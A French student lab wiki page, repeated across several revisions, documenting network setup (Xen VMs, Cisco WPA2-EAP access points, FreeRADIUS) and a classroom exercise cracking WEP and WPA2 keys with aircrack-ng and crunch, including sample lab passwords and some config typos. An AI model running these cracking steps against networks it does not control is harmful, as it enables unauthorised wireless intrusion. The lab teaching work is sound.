radius-server host < ip_groupe6 > auth-port 1812 acct-port 1813 // on remplace ip_groupe6 par l'IP de notre groupe (de la VM) , et comme port d'authentification 1812,et accounting 1813

6- On defini le server group :

aaa group server radius radius_groupe6 // on remplace groupe6 par le nom de notre groupe "IMA2a5-4fun"

7- Puis, on associe à ce groupe de serveur le serveur créé sur la VM:

server <ip_groupe6> auth-port 1812 acct-port 1813

8- Ensuite, on defini le login et le groupe server que par lequel l'utilisateur passera pour s'authentifier :

aaa authentication login eap_groupe6 group radius_groupe6 // groupe6 remplacé par le nom de notre groupe

9- On arrive à la création des SSID, protégé par la méthode WPA2-EAP :

dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun"
authentication open eap eap_IMA2a5-4fun
authentication network-eap eap_IMA2a5-4fun
authentication key-management wpa

10- Configurer les vlans des groupes :

interface Dot11Radio0 // on rentre d'abord dans l'interface Dot11Radio0
encryption vlan x mode ciphers aes-ccm tkip // Où x est le numéro du vlan . Pour notre groupe x=7

Pour pouvoir se connecter au réseau, il faudra relier l'interfaces virtuelle à l'interface gigabites, via des 'bridge-groupe', et comme il y a plusieurs grouoes, il faut créer autant des sous-interfaces dot11radio0 et puis la relier
aux sous-interfaces gigabites.

11- Créer une sous-interface pour chaque groupe, en donnant à l'instance le numéro du vlan :

interface dot11Radio0.num_vlan // num_vlan a remplacer par le numéro du vlan
encapsulation dot1Q num_vlan
bridge-group num_vlan

12- Créer une sous-interface gigabite pour chaque groupe, en donnant à l'instance le numéro du vlan :

interface gigabite0.num_vlan // num_vlan a remplacer par le numéro du vlan
encapsulation dot1Q num_vlan
bridge-group num_vlan

13- Ajouter les SSID à l'interface Dot11Radio0

interface Dot11Radio0 // se mettre dans la bonne interface (i.e Dot11Radio0)
ssid SSID_groupe // on remplace "groupe" par le nom du groupe de la promo /* CETTE COMMANDE EST À FAIRE POUR TOUT LES SSID */

14- rendre les SSID visibles :

interface Dot11Radio0
mbssid // Il faut rajouter l'option "mbssid" à l'interface Dot11Radio0
dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun"
mbssid guest-mode // mettre les ssid en guest-mode pour qu'il soient visibles. /* CES COMMANDES SONT À FAIRE POUR CHAQUE SSID */

=== Configuration serveur FreeRadius ===

Installation de freeradius:

apt-get install freeradius

Dans le fichier <code>/etc/freeradius/3.0/users</code> on ajoute la ligne:

nyx Cleartext-Password := "glopglop"

Dans le fichier <code>/etc/freeradius/3.0/mods-enabled/eap</code> on modifie la ligne:

eap{
default_eap_type = peap
}

Dans le fichier <code>/etc/freeradius/3.0//mods-enabled/mschap</code> on décommente les lignes suivantes et modifie

use_mppe = yes
require_encryption = yes
require_strong = yes

et on ajoute la ligne suivante:

with_ntdomain_hack = yes

== Crackage de la clé WEP ==

Etape 1: Installation de aircrack-ng

Pour installer aircrack-ng il nous faut etablir la connexion internet par Ethernet dans le eeepc
Ensuite :

apt-get install aircrack-ng

Comme le wifi du pc ne fonctionne pas correctement on utilise un module WI-FI Wi-pi pour le visualiser peripherique on utilise la commande

airmon-ng (pour voir le nom du Wi-pi)
airmon-ng start wlx40a5ef0125eg

[[Fichier:Hf img1.png|700px|center]]

Ensuite il renomme le périphérique en wlan0mon

[[Fichier:HF Img2.png|700px|center]]

On peut ensuite ecouté le réseau avec la commande airodump-ng en spécifiant le canal -c et le module wi-fi utilisé

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a cracotte 6 pour nous c'est 04:DA:D2:9C:50:55

[[Fichier:Wep-image1.png|700px|center]]

Ensuite on capture les packets pour avoir assez IV pour cracker la clé wep cela crée un fichier .cap qu'on utilisera par la suite

airodump-ng -w out -c 8 --bssid 04:DA:D2:9C:50:55 wlan0mon

En parrallèle on lance aircrack pour effectuer des tentatives pour obtenir la clé wep

aircrack-ng out-01.cap

Maintenant il faut attendre d'avoir assez donnée pour casser la clé wep
sachant que avec 25 000 IV on a 50% de chance d'obtenir le mdp
et 50 000 on 90% de chance

[[Fichier:Wep-image2.png|700px|center]]

=== Cassage du WPA2 ===

Dans cette partie, on utilisera la méthode du dictionnaire.

Pour le cassage du WPA on a besoin du handshake pour le recuperer on ecoute le réseau avec la commande airodump-ng

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a Kracotte 6 pour nous c'est 04:DA:D2:9C:50:5D

Ensuite on doit récupérer le handshake pour ça on utilise airodump

airodump-ng -c 2 --bssid 04:DA:D2:9C:50:5D -w -tplink wlan0mon

[[Fichier:Recup handshake wpa 2.png|700px|center]]

Cela nous crée un .cap avec le handshake

Comme la puissance de calcul et petite sur les eeepc on utilise une zabeth

on crée le dictionnaire avec crunch :

crunch 8 8 0123456789 >> psw.txt

ensuite lance aircrack avec la commande suivante :

aircrack-ng -0 -w dictionnaire.txt tplink-01.cap

[[Fichier:Wpa craked.png|700px|center]]

au bout de 45min on trouve la clé wpa.

<VirtualHost *:80>
ServerName ima2a5-4fun.site
ServerAlias www.ima2a5-4fun.site
DocumentRoot "/var/www/ima2a5-4fun"
<Directory "/var/www/ima2a5-4fun">
Options +FollowSymLinks
AllowOverride all
Require all granted
</Directory>
ErrorLog /var/log/apache2/error.ima2a5-4fun.site.log
CustomLog /var/log/apache2/access.ima2a5-4fun.site.com.log combined
</VirtualHost>

TP sysres IMA2a5 2019/2020 G6

2019-11-28T08:58:35Z

Jcabrald : /* Configuration serveur FreeRadius */

Jorge Cabral & Hamza Fahim

== Introduction ==
Le projet a pour but de mettre en place un réseau sur 2 salles du bâtiment E de polytech constitué de 2 routeurs, 2 commutateurs, 2 bornes Wifi et un serveur.
Chaque groupe dispose de machines virtuelles sur le serveur, qui permettront de constituer chacun un domaine acheté sur GANDI.
Les routeurs et commutateurs seront configurés à l'aide de netbooks configurés par nos soins.

== Installation du réseau : connexion des routeurs, commutateurs, bornes WiFi et du serveur Cordouan ==
[[Fichier:archi_reseau_2.png]]

== Mise en place du serveur ==

=== Préparation et configuration des machines virtuelles ===

==== Création de la machine virtuelle ====
La machine virtuelle est crée sur le serveur Cordouan :
ssh root@cordouan.insecserv.deule.net

Création de la machine virtuelle :
xen-create-image --hostname=ima2a5-4fun --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --force

==== Démarrage/Arrêt/Redémarrage de la machine virtuelle ====
Avant de démarrer la VM, nous devons modifierle fichier /etc/xen/ima2a5-4fun.cfg afin de rajouter le bridge.
Il faut d'abord récuperer le nom du bridge avec la commande:
brctl show
Le du bridge est :IMA2a5
Ensuite nous remplaçons dans le fichier "ima2a5-4fun.cfg" la ligne contenant "vif = [ 'mac=00:16:3E:A8:74:CA']" par :
vif = [ 'mac=00:16:3E:A8:74:CA, bridge=IMA2a5']

Puis,nous pouvons démarrager la machine virtuelle :
xl create /etc/xen/ima2a5-4fun.cfg

et acceder à la VM :
xl console ima2a5-4fun
L'utilisateur étant:
user : root
password: c'est le contenu de ligne commençant par "Root Password" du fichier "/var/log/xen-tools/ima2a5-4fun.log"

Pour changer le password root, utiliser:
passwd

On peut revenir à la machine hôte sans arrêter la MV avec la combinaison
Ctrl + AltGr + ]

Arrêt de la machine virtuelle depuis l'hôte :
xl destroy ima2a5-4fun

==== Adaptation de la machine virtuelle à l'architecture réseau du projet ====
Coordonnées IP statiques de la machine virtuelle sur le fichier /etc/network/interfaces
iface eth0 inet static
address 193.48.57.166
netmask 255.255.255.240
gateway 193.48.57.172

==== Personnalisation des points de montage /var et /home ====

Création de 2 volumes de 10GB sur la machine hôte :
lvcreate -L10G -n ima2a5-4fun-home virtual
lvcreate -L10G -n ima2a5-4fun-var virtual

Formatage des volumes :
mkfs.ext4 /dev/virtual/ima2a5-4fun-home
mkfs.ext4 /dev/virtual/ima2a5-4fun-var

Inclusion des volumes dans la machine virtuelle en modifiant /etc/xen/ima2a5-4fun.cfg :

root = '/dev/xvda2 ro'
disk = [
'file:/usr/local/xen/domains/ima2a5-4fun/disk.img,xvda2,w',
'file:/usr/local/xen/domains/ima2a5-4fun/swap.img,xvda1,w',
'phy:/dev/virtual/ima2a5-4fun-home,xvdb1,w',
'phy:/dev/virtual/ima2a5-4fun-var,xvdb2,w'
]

Afin de vérifier si tout est correct on arrête complétement la VM (et non pas rebboter) et on recréé la VM

puis, vérifier sur la machine hôte et la VM si les deux partitions on bien été créées avec la commande:
fdisk -l

Puis, on modifie le fichier /etc/fstable de la VM pour que l'OS les monte automatiquement au démarrage:
# <file system> <mount point> <type> <options> <dump> <pass>
proc /proc proc defaults 0 0
devpts /dev/pts devpts rw,noexec,nosuid,gid=5,mode=620 0 0
/dev/xvda1 none swap sw 0 0
/dev/xvda2 / xt4 noatime,nodiratime,errors=remount-ro 0 1
/dev/xvdb1 /home ext4 defaults 0 2
/dev/xvdb2 /var ext4 defaults 0 2

==== Installation des serveurs SSH, DNS et https ====

Installation du serveur apache :
apt install apache2

Installation du serveur ssh :
apt install openssh-server

Création du service sshd lancé au démarrage par runit :
mkdir /etc/service
mkdir /etc/service/sshd
touch /etc/service/sshd/run
configuration du fichier etc/service/sshd/run:
#!/bin/sh
ssh-ketgen -A >/dev/null 2>&1
[ -r conf ] && . ./conf
exec /usr/sbin/sshd -D $OPTS

Autorise l'exécution du fichier run
chmod +x /etc/service/sshd/run

== Sécurisation Wifi par WPA2-EAP ==
=== Configuration des points d'accès Wi-Fi===

Dans cette partie, on dispose de deux bornes wifi a configurer, la premiére en E306 et l'autre en E304, en utilisera le server FreeRadius pour l'identification.
Tout d'abord effectuons un purge:
apt purge brltty

Puis:

1- Acceder à la configuration de la borne wifi :

minicom -os

On change la configuration pour: Port = /dev/ttyUSB0, 9600 bauds et sans control de flux

2- Se mettre en mode previligié :

enable
Password = "Cisco"

3- Se mettre en mode configuration :

config term

(On peut aussi verifier la configuration de la borne avec "show run")

NB : Les commandes 5 à 10, sont à faire pour chaque groupe de la promo.

4- Pour utiliser le system en 'authentication, authorization, and accounting', il faut cette commande :

aaa new-model

5- On crée un server radius pour un groupe :

radius-server host < ip_groupe6 > auth-port 1812 acct-port 1813 // on remplace ip_groupe6 par l'IP de notre groupe (de la VM) , et comme port d'authentification 1812,et accounting 1813

6- On defini le server group :

aaa group server radius radius_groupe6 // on remplace groupe6 par le nom de notre groupe "IMA2a5-4fun"

7- Puis, on associe à ce groupe de serveur le serveur créé sur la VM:

server <ip_groupe6> auth-port 1812 acct-port 1813

8- Ensuite, on defini le login et le groupe server que par lequel l'utilisateur passera pour s'authentifier :

aaa authentication login eap_IMA2a5-4fun group radius_IMA2a5-4fun // groupe6 remplacé par le nom de notre groupe

9- On arrive à la création des SSID, protégé par la méthode WPA2-EAP :

dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun"
authentication open eap eap_IMA2a5-4fun
authentication network-eap eap_IMA2a5-4fun
authentication key-management wpa

10- Configurer les vlans des groupes :

interface Dot11Radio0 // on rentre d'abord dans l'interface Dot11Radio0
encryption vlan x mode ciphers aes-ccm tkip // Où x est le numéro du vlan . Pour notre groupe x=7

Pour pouvoir se connecter au réseau, il faudra relier l'interfaces virtuelle à l'interface gigabites, via des 'bridge-groupe', et comme il y a plusieurs grouoes, il faut créer autant des sous-interfaces dot11radio0 et puis la relier
aux sous-interfaces gigabites.

11- Créer une sous-interface pour chaque groupe, en donnant à l'instance le numéro du vlan :

interface dot11Radio0.num_vlan // num_vlan a remplacer par le numéro du vlan
encapsulation dot1Q num_vlan
bridge-group num_vlan

12- Créer une sous-interface gigabite pour chaque groupe, en donnant à l'instance le numéro du vlan :

interface gigabite0.num_vlan // num_vlan a remplacer par le numéro du vlan
encapsulation dot1Q num_vlan
bridge-group num_vlan

13- Ajouter les SSID à l'interface Dot11Radio0

interface Dot11Radio0 // se mettre dans la bonne interface (i.e Dot11Radio0)
ssid SSID_groupe // on remplace "groupe" par le nom du groupe de la promo /* CETTE COMMANDE EST À FAIRE POUR TOUT LES SSID */

14- rendre les SSID visibles :

interface Dot11Radio0
mbssid // Il faut rajouter l'option "mbssid" à l'interface Dot11Radio0
dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun"
mbssid guest-mode // mettre les ssid en guest-mode pour qu'il soient visibles. /* CES COMMANDES SONT À FAIRE POUR CHAQUE SSID */

=== Configuration serveur FreeRadius ===

Installation de freeradius:

apt-get install freeradius

Dans le fichier <code>/etc/freeradius/3.0/users</code> on ajoute la ligne:

nyx Cleartext-Password := "glopglop"

Dans le fichier <code>/etc/freeradius/3.0/mods-enabled/eap</code> on modifie la ligne:

eap{
default_eap_type = peap
}

Dans le fichier <code>/etc/freeradius/3.0//mods-enabled/mschap</code> on décommente les lignes suivantes et modifie

use_mppe = yes
require_encryption = yes
require_strong = yes

et on ajoute la ligne suivante:

with_ntdomain_hack = yes

== Crackage de la clé WEP ==

Etape 1: Installation de aircrack-ng

Pour installer aircrack-ng il nous faut etablir la connexion internet par Ethernet dans le eeepc
Ensuite :

apt-get install aircrack-ng

Comme le wifi du pc ne fonctionne pas correctement on utilise un module WI-FI Wi-pi pour le visualiser peripherique on utilise la commande

airmon-ng (pour voir le nom du Wi-pi)
airmon-ng start wlx40a5ef0125eg

[[Fichier:Hf img1.png|700px|center]]

Ensuite il renomme le périphérique en wlan0mon

[[Fichier:HF Img2.png|700px|center]]

On peut ensuite ecouté le réseau avec la commande airodump-ng en spécifiant le canal -c et le module wi-fi utilisé

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a cracotte 6 pour nous c'est 04:DA:D2:9C:50:55

[[Fichier:Wep-image1.png|700px|center]]

Ensuite on capture les packets pour avoir assez IV pour cracker la clé wep cela crée un fichier .cap qu'on utilisera par la suite

airodump-ng -w out -c 8 --bssid 04:DA:D2:9C:50:55 wlan0mon

En parrallèle on lance aircrack pour effectuer des tentatives pour obtenir la clé wep

aircrack-ng out-01.cap

Maintenant il faut attendre d'avoir assez donnée pour casser la clé wep
sachant que avec 25 000 IV on a 50% de chance d'obtenir le mdp
et 50 000 on 90% de chance

[[Fichier:Wep-image2.png|700px|center]]

=== Cassage du WPA2 ===

Dans cette partie, on utilisera la méthode du dictionnaire.

Pour le cassage du WPA on a besoin du handshake pour le recuperer on ecoute le réseau avec la commande airodump-ng

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a Kracotte 6 pour nous c'est 04:DA:D2:9C:50:5D

Ensuite on doit récupérer le handshake pour ça on utilise airodump

airodump-ng -c 2 --bssid 04:DA:D2:9C:50:5D -w -tplink wlan0mon

[[Fichier:Recup handshake wpa 2.png|700px|center]]

Cela nous crée un .cap avec le handshake

Comme la puissance de calcul et petite sur les eeepc on utilise une zabeth

on crée le dictionnaire avec crunch :

crunch 8 8 0123456789 >> psw.txt

ensuite lance aircrack avec la commande suivante :

aircrack-ng -0 -w dictionnaire.txt tplink-01.cap

[[Fichier:Wpa craked.png|700px|center]]

au bout de 45min on trouve la clé wpa.

<VirtualHost *:80>
ServerName ima2a5-4fun.site
ServerAlias www.ima2a5-4fun.site
DocumentRoot "/var/www/ima2a5-4fun"
<Directory "/var/www/ima2a5-4fun">
Options +FollowSymLinks
AllowOverride all
Require all granted
</Directory>
ErrorLog /var/log/apache2/error.ima2a5-4fun.site.log
CustomLog /var/log/apache2/access.ima2a5-4fun.site.com.log combined
</VirtualHost>

TP sysres IMA2a5 2019/2020 G6

2019-11-28T08:43:25Z

Jcabrald : /* Configuration serveur FreeRadius */

Jorge Cabral & Hamza Fahim

== Introduction ==
Le projet a pour but de mettre en place un réseau sur 2 salles du bâtiment E de polytech constitué de 2 routeurs, 2 commutateurs, 2 bornes Wifi et un serveur.
Chaque groupe dispose de machines virtuelles sur le serveur, qui permettront de constituer chacun un domaine acheté sur GANDI.
Les routeurs et commutateurs seront configurés à l'aide de netbooks configurés par nos soins.

== Installation du réseau : connexion des routeurs, commutateurs, bornes WiFi et du serveur Cordouan ==
[[Fichier:archi_reseau_2.png]]

== Mise en place du serveur ==

=== Préparation et configuration des machines virtuelles ===

==== Création de la machine virtuelle ====
La machine virtuelle est crée sur le serveur Cordouan :
ssh root@cordouan.insecserv.deule.net

Création de la machine virtuelle :
xen-create-image --hostname=ima2a5-4fun --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --force

==== Démarrage/Arrêt/Redémarrage de la machine virtuelle ====
Avant de démarrer la VM, nous devons modifierle fichier /etc/xen/ima2a5-4fun.cfg afin de rajouter le bridge.
Il faut d'abord récuperer le nom du bridge avec la commande:
brctl show
Le du bridge est :IMA2a5
Ensuite nous remplaçons dans le fichier "ima2a5-4fun.cfg" la ligne contenant "vif = [ 'mac=00:16:3E:A8:74:CA']" par :
vif = [ 'mac=00:16:3E:A8:74:CA, bridge=IMA2a5']

Puis,nous pouvons démarrager la machine virtuelle :
xl create /etc/xen/ima2a5-4fun.cfg

et acceder à la VM :
xl console ima2a5-4fun
L'utilisateur étant:
user : root
password: c'est le contenu de ligne commençant par "Root Password" du fichier "/var/log/xen-tools/ima2a5-4fun.log"

Pour changer le password root, utiliser:
passwd

On peut revenir à la machine hôte sans arrêter la MV avec la combinaison
Ctrl + AltGr + ]

Arrêt de la machine virtuelle depuis l'hôte :
xl destroy ima2a5-4fun

==== Adaptation de la machine virtuelle à l'architecture réseau du projet ====
Coordonnées IP statiques de la machine virtuelle sur le fichier /etc/network/interfaces
iface eth0 inet static
address 193.48.57.166
netmask 255.255.255.240
gateway 193.48.57.172

==== Personnalisation des points de montage /var et /home ====

Création de 2 volumes de 10GB sur la machine hôte :
lvcreate -L10G -n ima2a5-4fun-home virtual
lvcreate -L10G -n ima2a5-4fun-var virtual

Formatage des volumes :
mkfs.ext4 /dev/virtual/ima2a5-4fun-home
mkfs.ext4 /dev/virtual/ima2a5-4fun-var

Inclusion des volumes dans la machine virtuelle en modifiant /etc/xen/ima2a5-4fun.cfg :

root = '/dev/xvda2 ro'
disk = [
'file:/usr/local/xen/domains/ima2a5-4fun/disk.img,xvda2,w',
'file:/usr/local/xen/domains/ima2a5-4fun/swap.img,xvda1,w',
'phy:/dev/virtual/ima2a5-4fun-home,xvdb1,w',
'phy:/dev/virtual/ima2a5-4fun-var,xvdb2,w'
]

Afin de vérifier si tout est correct on arrête complétement la VM (et non pas rebboter) et on recréé la VM

puis, vérifier sur la machine hôte et la VM si les deux partitions on bien été créées avec la commande:
fdisk -l

Puis, on modifie le fichier /etc/fstable de la VM pour que l'OS les monte automatiquement au démarrage:
# <file system> <mount point> <type> <options> <dump> <pass>
proc /proc proc defaults 0 0
devpts /dev/pts devpts rw,noexec,nosuid,gid=5,mode=620 0 0
/dev/xvda1 none swap sw 0 0
/dev/xvda2 / xt4 noatime,nodiratime,errors=remount-ro 0 1
/dev/xvdb1 /home ext4 defaults 0 2
/dev/xvdb2 /var ext4 defaults 0 2

==== Installation des serveurs SSH, DNS et https ====

Installation du serveur apache :
apt install apache2

Installation du serveur ssh :
apt install openssh-server

Création du service sshd lancé au démarrage par runit :
mkdir /etc/service
mkdir /etc/service/sshd
touch /etc/service/sshd/run
configuration du fichier etc/service/sshd/run:
#!/bin/sh
ssh-ketgen -A >/dev/null 2>&1
[ -r conf ] && . ./conf
exec /usr/sbin/sshd -D $OPTS

Autorise l'exécution du fichier run
chmod +x /etc/service/sshd/run

== Sécurisation Wifi par WPA2-EAP ==
=== Configuration des points d'accès Wi-Fi===

Dans cette partie, on dispose de deux bornes wifi a configurer, la premiére en E306 et l'autre en E304, en utilisera le server FreeRadius pour l'identification.
Tout d'abord effectuons un purge:
apt purge brltty

Puis:

1- Acceder à la configuration de la borne wifi :

minicom -os

On change la configuration pour: Port = /dev/ttyUSB0, 9600 bauds et sans control de flux

2- Se mettre en mode previligié :

enable
Password = "Cisco"

3- Se mettre en mode configuration :

config term

(On peut aussi verifier la configuration de la borne avec "show run")

NB : Les commandes 5 à 10, sont à faire pour chaque groupe de la promo.

4- Pour utiliser le system en 'authentication, authorization, and accounting', il faut cette commande :

aaa new-model

5- On crée un server radius pour un groupe :

radius-server host < ip_groupe6 > auth-port 1812 acct-port 1813 // on remplace ip_groupe6 par l'IP de notre groupe (de la VM) , et comme port d'authentification 1812,et accounting 1813

6- On defini le server group :

aaa group server radius radius_groupe6 // on remplace groupe6 par le nom de notre groupe "IMA2a5-4fun"

7- Puis, on associe à ce groupe de serveur le serveur créé sur la VM:

server <ip_groupe6> auth-port 1812 acct-port 1813

8- Ensuite, on defini le login et le groupe server que par lequel l'utilisateur passera pour s'authentifier :

aaa authentication login eap_IMA2a5-4fun group radius_IMA2a5-4fun // groupe6 remplacé par le nom de notre groupe

9- On arrive à la création des SSID, protégé par la méthode WPA2-EAP :

dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun"
authentication open eap eap_IMA2a5-4fun
authentication network-eap eap_IMA2a5-4fun
authentication key-management wpa

10- Configurer les vlans des groupes :

interface Dot11Radio0 // on rentre d'abord dans l'interface Dot11Radio0
encryption vlan x mode ciphers aes-ccm tkip // Où x est le numéro du vlan . Pour notre groupe x=7

Pour pouvoir se connecter au réseau, il faudra relier l'interfaces virtuelle à l'interface gigabites, via des 'bridge-groupe', et comme il y a plusieurs grouoes, il faut créer autant des sous-interfaces dot11radio0 et puis la relier
aux sous-interfaces gigabites.

11- Créer une sous-interface pour chaque groupe, en donnant à l'instance le numéro du vlan :

interface dot11Radio0.num_vlan // num_vlan a remplacer par le numéro du vlan
encapsulation dot1Q num_vlan
bridge-group num_vlan

12- Créer une sous-interface gigabite pour chaque groupe, en donnant à l'instance le numéro du vlan :

interface gigabite0.num_vlan // num_vlan a remplacer par le numéro du vlan
encapsulation dot1Q num_vlan
bridge-group num_vlan

13- Ajouter les SSID à l'interface Dot11Radio0

interface Dot11Radio0 // se mettre dans la bonne interface (i.e Dot11Radio0)
ssid SSID_groupe // on remplace "groupe" par le nom du groupe de la promo /* CETTE COMMANDE EST À FAIRE POUR TOUT LES SSID */

14- rendre les SSID visibles :

interface Dot11Radio0
mbssid // Il faut rajouter l'option "mbssid" à l'interface Dot11Radio0
dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun"
mbssid guest-mode // mettre les ssid en guest-mode pour qu'il soient visibles. /* CES COMMANDES SONT À FAIRE POUR CHAQUE SSID */

=== Configuration serveur FreeRadius ===

Installation de freeradius:

apt-get install freeradius

Dans le fichier <code>/etc/freeradius/3.0/users</code> on ajoute la ligne:

nyx Cleartext-Password := "glopglop"

Dans le fichier <code>/etc/freeradius/3.0/mods-enabled/eap</code> on modifie la ligne:

eap{
default_eap_type = peap
}

Dans le fichier <code>/etc/freeradius/mods-enabled/mschap</code> on décommente les lignes suivantes

use_mppe = yes
require_encryption = yes
require_strong = yes

et on ajoute la ligne suivante:

with_ntdomain_hack = yes

== Crackage de la clé WEP ==

Etape 1: Installation de aircrack-ng

Pour installer aircrack-ng il nous faut etablir la connexion internet par Ethernet dans le eeepc
Ensuite :

apt-get install aircrack-ng

Comme le wifi du pc ne fonctionne pas correctement on utilise un module WI-FI Wi-pi pour le visualiser peripherique on utilise la commande

airmon-ng (pour voir le nom du Wi-pi)
airmon-ng start wlx40a5ef0125eg

[[Fichier:Hf img1.png|700px|center]]

Ensuite il renomme le périphérique en wlan0mon

[[Fichier:HF Img2.png|700px|center]]

On peut ensuite ecouté le réseau avec la commande airodump-ng en spécifiant le canal -c et le module wi-fi utilisé

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a cracotte 6 pour nous c'est 04:DA:D2:9C:50:55

[[Fichier:Wep-image1.png|700px|center]]

Ensuite on capture les packets pour avoir assez IV pour cracker la clé wep cela crée un fichier .cap qu'on utilisera par la suite

airodump-ng -w out -c 8 --bssid 04:DA:D2:9C:50:55 wlan0mon

En parrallèle on lance aircrack pour effectuer des tentatives pour obtenir la clé wep

aircrack-ng out-01.cap

Maintenant il faut attendre d'avoir assez donnée pour casser la clé wep
sachant que avec 25 000 IV on a 50% de chance d'obtenir le mdp
et 50 000 on 90% de chance

[[Fichier:Wep-image2.png|700px|center]]

=== Cassage du WPA2 ===

Dans cette partie, on utilisera la méthode du dictionnaire.

Pour le cassage du WPA on a besoin du handshake pour le recuperer on ecoute le réseau avec la commande airodump-ng

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a Kracotte 6 pour nous c'est 04:DA:D2:9C:50:5D

Ensuite on doit récupérer le handshake pour ça on utilise airodump

airodump-ng -c 2 --bssid 04:DA:D2:9C:50:5D -w -tplink wlan0mon

[[Fichier:Recup handshake wpa 2.png|700px|center]]

Cela nous crée un .cap avec le handshake

Comme la puissance de calcul et petite sur les eeepc on utilise une zabeth

on crée le dictionnaire avec crunch :

crunch 8 8 0123456789 >> psw.txt

ensuite lance aircrack avec la commande suivante :

aircrack-ng -0 -w dictionnaire.txt tplink-01.cap

[[Fichier:Wpa craked.png|700px|center]]

au bout de 45min on trouve la clé wpa.

<VirtualHost *:80>
ServerName ima2a5-4fun.site
ServerAlias www.ima2a5-4fun.site
DocumentRoot "/var/www/ima2a5-4fun"
<Directory "/var/www/ima2a5-4fun">
Options +FollowSymLinks
AllowOverride all
Require all granted
</Directory>
ErrorLog /var/log/apache2/error.ima2a5-4fun.site.log
CustomLog /var/log/apache2/access.ima2a5-4fun.site.com.log combined
</VirtualHost>

TP sysres IMA2a5 2019/2020 G6

2019-11-28T08:43:11Z

Jcabrald : /* Configuration serveur FreeRadius */

Jorge Cabral & Hamza Fahim

== Introduction ==
Le projet a pour but de mettre en place un réseau sur 2 salles du bâtiment E de polytech constitué de 2 routeurs, 2 commutateurs, 2 bornes Wifi et un serveur.
Chaque groupe dispose de machines virtuelles sur le serveur, qui permettront de constituer chacun un domaine acheté sur GANDI.
Les routeurs et commutateurs seront configurés à l'aide de netbooks configurés par nos soins.

== Installation du réseau : connexion des routeurs, commutateurs, bornes WiFi et du serveur Cordouan ==
[[Fichier:archi_reseau_2.png]]

== Mise en place du serveur ==

=== Préparation et configuration des machines virtuelles ===

==== Création de la machine virtuelle ====
La machine virtuelle est crée sur le serveur Cordouan :
ssh root@cordouan.insecserv.deule.net

Création de la machine virtuelle :
xen-create-image --hostname=ima2a5-4fun --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --force

==== Démarrage/Arrêt/Redémarrage de la machine virtuelle ====
Avant de démarrer la VM, nous devons modifierle fichier /etc/xen/ima2a5-4fun.cfg afin de rajouter le bridge.
Il faut d'abord récuperer le nom du bridge avec la commande:
brctl show
Le du bridge est :IMA2a5
Ensuite nous remplaçons dans le fichier "ima2a5-4fun.cfg" la ligne contenant "vif = [ 'mac=00:16:3E:A8:74:CA']" par :
vif = [ 'mac=00:16:3E:A8:74:CA, bridge=IMA2a5']

Puis,nous pouvons démarrager la machine virtuelle :
xl create /etc/xen/ima2a5-4fun.cfg

et acceder à la VM :
xl console ima2a5-4fun
L'utilisateur étant:
user : root
password: c'est le contenu de ligne commençant par "Root Password" du fichier "/var/log/xen-tools/ima2a5-4fun.log"

Pour changer le password root, utiliser:
passwd

On peut revenir à la machine hôte sans arrêter la MV avec la combinaison
Ctrl + AltGr + ]

Arrêt de la machine virtuelle depuis l'hôte :
xl destroy ima2a5-4fun

==== Adaptation de la machine virtuelle à l'architecture réseau du projet ====
Coordonnées IP statiques de la machine virtuelle sur le fichier /etc/network/interfaces
iface eth0 inet static
address 193.48.57.166
netmask 255.255.255.240
gateway 193.48.57.172

==== Personnalisation des points de montage /var et /home ====

Création de 2 volumes de 10GB sur la machine hôte :
lvcreate -L10G -n ima2a5-4fun-home virtual
lvcreate -L10G -n ima2a5-4fun-var virtual

Formatage des volumes :
mkfs.ext4 /dev/virtual/ima2a5-4fun-home
mkfs.ext4 /dev/virtual/ima2a5-4fun-var

Inclusion des volumes dans la machine virtuelle en modifiant /etc/xen/ima2a5-4fun.cfg :

root = '/dev/xvda2 ro'
disk = [
'file:/usr/local/xen/domains/ima2a5-4fun/disk.img,xvda2,w',
'file:/usr/local/xen/domains/ima2a5-4fun/swap.img,xvda1,w',
'phy:/dev/virtual/ima2a5-4fun-home,xvdb1,w',
'phy:/dev/virtual/ima2a5-4fun-var,xvdb2,w'
]

Afin de vérifier si tout est correct on arrête complétement la VM (et non pas rebboter) et on recréé la VM

puis, vérifier sur la machine hôte et la VM si les deux partitions on bien été créées avec la commande:
fdisk -l

Puis, on modifie le fichier /etc/fstable de la VM pour que l'OS les monte automatiquement au démarrage:
# <file system> <mount point> <type> <options> <dump> <pass>
proc /proc proc defaults 0 0
devpts /dev/pts devpts rw,noexec,nosuid,gid=5,mode=620 0 0
/dev/xvda1 none swap sw 0 0
/dev/xvda2 / xt4 noatime,nodiratime,errors=remount-ro 0 1
/dev/xvdb1 /home ext4 defaults 0 2
/dev/xvdb2 /var ext4 defaults 0 2

==== Installation des serveurs SSH, DNS et https ====

Installation du serveur apache :
apt install apache2

Installation du serveur ssh :
apt install openssh-server

Création du service sshd lancé au démarrage par runit :
mkdir /etc/service
mkdir /etc/service/sshd
touch /etc/service/sshd/run
configuration du fichier etc/service/sshd/run:
#!/bin/sh
ssh-ketgen -A >/dev/null 2>&1
[ -r conf ] && . ./conf
exec /usr/sbin/sshd -D $OPTS

Autorise l'exécution du fichier run
chmod +x /etc/service/sshd/run

== Sécurisation Wifi par WPA2-EAP ==
=== Configuration des points d'accès Wi-Fi===

Dans cette partie, on dispose de deux bornes wifi a configurer, la premiére en E306 et l'autre en E304, en utilisera le server FreeRadius pour l'identification.
Tout d'abord effectuons un purge:
apt purge brltty

Puis:

1- Acceder à la configuration de la borne wifi :

minicom -os

On change la configuration pour: Port = /dev/ttyUSB0, 9600 bauds et sans control de flux

